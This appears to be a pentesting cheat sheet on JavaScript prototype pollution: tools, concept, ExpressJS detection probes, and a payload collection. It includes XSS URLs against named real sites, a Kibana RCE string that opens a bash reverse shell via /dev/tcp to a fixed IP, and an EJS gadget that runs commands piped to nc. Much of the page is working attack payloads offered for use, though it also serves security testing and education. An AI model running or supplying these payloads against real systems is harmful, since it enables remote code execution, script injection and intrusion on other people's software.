8.9 KiB
Prototype Pollution
Prototype pollution is a type of vulnerability that occurs in JavaScript when properties of Object.prototype are modified. This is particularly risky because JavaScript objects are dynamic and we can add properties to them at any time. Also, almost all objects in JavaScript inherit from Object.prototype, making it a potential attack vector.
Summary
Tools
- yeswehack/pp-finder - Help you find gadget for prototype pollution exploitation
- yuske/silent-spring - Prototype Pollution Leads to Remote Code Execution in Node.js
- yuske/server-side-prototype-pollution - Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages
- BlackFan/client-side-prototype-pollution - Prototype Pollution and useful Script Gadgets
- portswigger/server-side-prototype-pollution - Burp Suite Extension detectiong Prototype Pollution vulnerabilities
- msrkp/PPScan
Labs
Exploit
In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of Object.prototype
, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.
var myDog = new Dog();
// Points to the function "Dog"
myDog.constructor;
// Points to the class definition of "Dog"
myDog.constructor.prototype;
myDog.__proto__;
myDog["__proto__"];
Examples
- Imagine that an application uses an object to maintain configuration settings, like this:
let config = { isAdmin: false };
- An attacker might be able to add an
isAdmin
property toObject.prototype
, like this:Object.prototype.isAdmin = true;
Manual Testing
- ExpressJS:
{ "__proto__":{"parameterLimit":1}}
+ 2 parameters in GET request, at least 1 must be reflected in the response. - ExpressJS:
{ "__proto__":{"ignoreQueryPrefix":true}}
+??foo=bar
- ExpressJS:
{ "__proto__":{"allowDots":true}}
+?foo.bar=baz
- Change the padding of a JSON response:
{ "__proto__":{"json spaces":" "}}
+{"foo":"bar"}
, the server should return{"foo": "bar"}
- Modify CORS header responses:
{ "__proto__":{"exposedHeaders":["foo"]}}
, the server should return the headerAccess-Control-Expose-Headers
. - Change the status code:
{ "__proto__":{"status":510}}
Prototype Pollution via JSON input
You can access the prototype of any object via the magic property __proto__
.
The JSON.parse()
function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen.
{
"__proto__": {
"evilProperty": "evilPayload"
}
}
Asynchronous payload for NodeJS.
{
"__proto__": {
"argv0":"node",
"shell":"node",
"NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com"
}
}
Prototype Pollution in URL
Example of Prototype Pollution payloads found in the wild.
https://victim.com/#a=b&__proto__[admin]=1
https://example.com/#__proto__[xxx]=alert(1)
http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1)
https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)
Prototype Pollution Exploitation
Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary.
- Remote Command Execution: RCE in Kibana (CVE-2019-7609)
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
- Remote Command Execution: RCE using EJS gadgets
{ "__proto__": { "client": 1, "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')" } }
- Reflected XSS: Reflected XSS on www.hackerone.com via Wistia embed code - #986386
- Client-side bypass: Prototype pollution – and bypassing client-side HTML sanitizers
- Deny of Service
Prototype Pollution Payloads
Object.__proto__["evilProperty"]="evilPayload"
Object.__proto__.evilProperty="evilPayload"
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
{"__proto__": {"evilProperty": "evilPayload"}}
{"__proto__.name":"test"}
x[__proto__][abaeead] = abaeead
x.__proto__.edcbcab = edcbcab
__proto__[eedffcb] = eedffcb
__proto__.baaebfc = baaebfc
?__proto__[test]=test
Prototype Pollution Gadgets
A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack.
Either create your own gadget using part of the source with yeswehack/pp-finder, or try to use already discovered gadgets yuske/server-side-prototype-pollution / BlackFan/client-side-prototype-pollution.
References
- A Pentester’s Guide to Prototype Pollution Attacks - HARSH BOTHRA - JAN 2, 2023
- A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us
- Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023
- Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - MICHAŁ BENTKOWSKI - October 30, 2019
- NodeJS - proto & prototype Pollution - HackTricks
- Prototype Pollution - PortSwigger
- Prototype pollution - Snyk
- Prototype pollution and bypassing client-side HTML sanitizers - MICHAŁ BENTKOWSKI - August 18, 2020
- Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023
- Prototype Pollution Attack in NodeJS - Olivier Arteau
- Prototype pollution attacks in NodeJS applications - Olivier Arteau - Youtube
- Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov
- Server side prototype pollution, how to detect and exploit - YesWeHack
- Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023
- Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes